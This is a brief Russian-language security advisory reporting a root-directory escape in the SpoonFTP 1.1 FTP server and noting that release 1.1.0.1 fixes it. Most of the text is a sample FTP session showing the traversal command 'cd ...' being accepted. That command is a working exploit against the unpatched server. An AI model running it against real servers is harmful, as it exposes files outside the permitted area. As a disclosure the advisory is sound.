Выход за пределы рут директории в Pi-Soft SpoonFTP 1.1
В Pi-Soft SpoonFTP 1.1 существует уязвимость, позволяющая выйти за пределы рут директории. Для решения был выпущен
релиз Pi-Soft SpoonFTP 1.1.0.1, в котором эта проблема исправлена.
ftp localhost
Connected to xxxxxxxx.edu.
220 SpoonFTP V1.1
User (xxxxxxxx.edu:(none)): jdog
331 Password required.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ...
250 CWD command successful.
ftp> pwd
257 "/..." is current directory.
ftp